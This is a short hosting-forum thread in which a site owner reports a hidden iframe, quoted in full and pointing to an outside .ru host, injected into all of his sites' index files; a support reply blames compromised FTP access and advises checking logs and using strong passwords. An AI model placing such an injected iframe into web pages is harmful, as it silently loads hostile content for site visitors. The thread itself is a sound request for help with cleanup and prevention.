Quote:
Originally Posted by Emase
We have had the following code added to all of our sites:
<iframe width=”125“ height=”125“ style=”visibility: hidden;“ src=”http://a3l.ru:8080/ts/in.cgi?pepsi85“>
It appears to have been added to all index files across all sites. I've manually removed it from all the important sites, but what caused this problem and how do I stop it happening again?
I'm guessing this is some kind of trojan horse? Has anybody else here been affected by this? I have seen posts online over the last 24 hours from other people who have been affected.
Any help much appreciated,
Mike
|
Generally these types of iframe injections are done through ftp. You can check the ftp logs on your vps at /var/log/messages. It is recommened to keep strong password for your accounts & if possible, frequently change the passwords.
Feel free to open a ticket on our helpdesk regarding this issue.